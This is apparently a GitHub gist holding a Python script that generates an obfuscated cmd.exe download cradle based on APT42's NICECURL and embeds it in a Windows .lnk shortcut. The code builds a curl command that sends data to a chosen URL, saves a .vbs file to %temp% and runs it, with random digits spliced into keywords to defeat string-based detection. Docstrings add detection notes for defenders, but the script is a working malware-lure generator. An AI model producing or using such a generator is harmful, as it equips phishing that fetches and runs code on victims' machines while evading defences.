
@HackingLZ
Created May 2, 2024 13:43
NICECURL Lnk Gen
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/
import argparse
import random
import win32com.client
def insert_digit(word, digit):
    """Return *word* with *digit* spliced in at a random interior position.

    The split index is drawn from ``1 .. len(word) - 1``, so the first and
    last characters of *word* always stay in place. A word shorter than two
    characters leaves ``random.randint`` with an empty range, which raises
    ``ValueError``.

    Analyst note: the output no longer contains the original keyword as a
    contiguous string, which is why literal-string matching on the generated
    command line misses it.
    """
    cut = random.randint(1, len(word) - 1)
    head, tail = word[:cut], word[cut:]
    return head + digit + tail
def generate_command(url: str, file_path: str) -> str:
    """Build the obfuscated cmd.exe one-liner modelled on the NICECURL lure.

    One random digit (0-9) is chosen and spliced into each of seven fixed
    keywords via ``insert_digit``. The returned string stores the mangled
    curl invocation in the environment variable ``c`` and the mangled
    ``start`` invocation in ``b``, then runs each through
    ``call %var:<digit>=%``, the cmd substring-replacement form that strips
    the digit again at execution time.

    Args:
        url: Base URL; the template appends ``/file`` to it.
        file_path: Value placed after curl's ``-d`` option.

    Returns:
        The command text without the leading ``cmd.exe /c``.

    Detection notes (defender view):
        * The raw command line does not contain the plain keywords, so rules
          should key on structure instead: ``set <var>=`` followed by
          ``call %<var>:<digit>=%``.
        * The de-obfuscated form is expected to surface in child-process
          telemetry (curl with ``--ssl-no-revoke``, ``-o`` into ``%temp%``,
          then a ``.vbs`` launched via ``start``) - confirm against your own
          process-creation logs.
        * The template references two different script names under
          ``%temp%`` (``down.vbs`` for the curl output, ``file.vbs`` for the
          launch); both are visible on this page.
    """
    # Single digit shared by every keyword so one %var:<digit>=% substitution
    # restores all of them.
    digit = str(random.randint(0, 9))
    words = ["curl", "ssl", "revoke", "POST", "down.vbs", "start", "file.vbs"]
    words_with_digit = [insert_digit(word, digit) for word in words]
    # The f-string fills in the mangled keywords, url and file_path; the
    # doubled braces leave a literal "{digit}" that the later .format() call
    # resolves. url and file_path are interpolated verbatim, so any braces in
    # them are also interpreted by .format().
    base_command = f"""
set c={words_with_digit[0]} --{words_with_digit[1]}-no-{words_with_digit[2]} -s -d "{file_path}" -X {words_with_digit[3]} {url}/file -o %temp%\\{words_with_digit[4]} & call %c:{{digit}}=% & set b={words_with_digit[5]} "" "%temp%\\{words_with_digit[6]}" & call %b:{{digit}}=%
""".strip().format(digit=digit)
    return base_command
def create_lnk(command, lnk_path):
    """Write a Windows shortcut at *lnk_path* that runs *command* via cmd.exe.

    Uses the ``WScript.Shell`` COM object (Windows with pywin32 only). The
    shortcut target is the absolute path to ``cmd.exe`` and the arguments are
    ``/c`` followed by *command*.

    Analyst note: a .lnk whose target is cmd.exe and whose arguments start
    with ``/c`` and contain ``set``/``call`` variable substitution is the
    artefact to look for when triaging files produced by this generator.
    """
    wsh = win32com.client.Dispatch('WScript.Shell')
    link = wsh.CreateShortcut(lnk_path)
    # Target and arguments are kept separate, as the shortcut format stores them.
    link.TargetPath = 'C:\\Windows\\System32\\cmd.exe'
    link.Arguments = '/c ' + command
    link.save()
def main():
    """Parse the command line, print the generated command, optionally emit a .lnk.

    Positional ``url`` and optional ``--file_path`` feed ``generate_command``.
    The command is always printed with a ``cmd.exe /c`` prefix; when ``--lnk``
    is supplied the same command (without that prefix, since ``create_lnk``
    adds its own ``/c``) is written into a shortcut at the given path.
    """
    cli = argparse.ArgumentParser(description="cmd download cradle based on nicecurl")
    cli.add_argument("url", type=str, help="URL")
    cli.add_argument(
        "--file_path",
        type=str,
        default="id=file.txt",
        help="File path default is 'id=file.txt'.",
    )
    cli.add_argument("--lnk", type=str, help="Optional: Path to create a shortcut LNK file.")
    opts = cli.parse_args()

    cradle = generate_command(opts.url, opts.file_path)
    print("Generated Command:\n", "cmd.exe /c " + cradle)

    # No --lnk given: printing the command is the only output.
    if not opts.lnk:
        return
    create_lnk(cradle, opts.lnk)
    print(f"Shortcut .lnk file created at {opts.lnk}")
# Run the CLI only when executed as a script, so importing this module (for
# example to study generate_command's output when writing detections) has no
# side effects.
if __name__ == "__main__":
    main()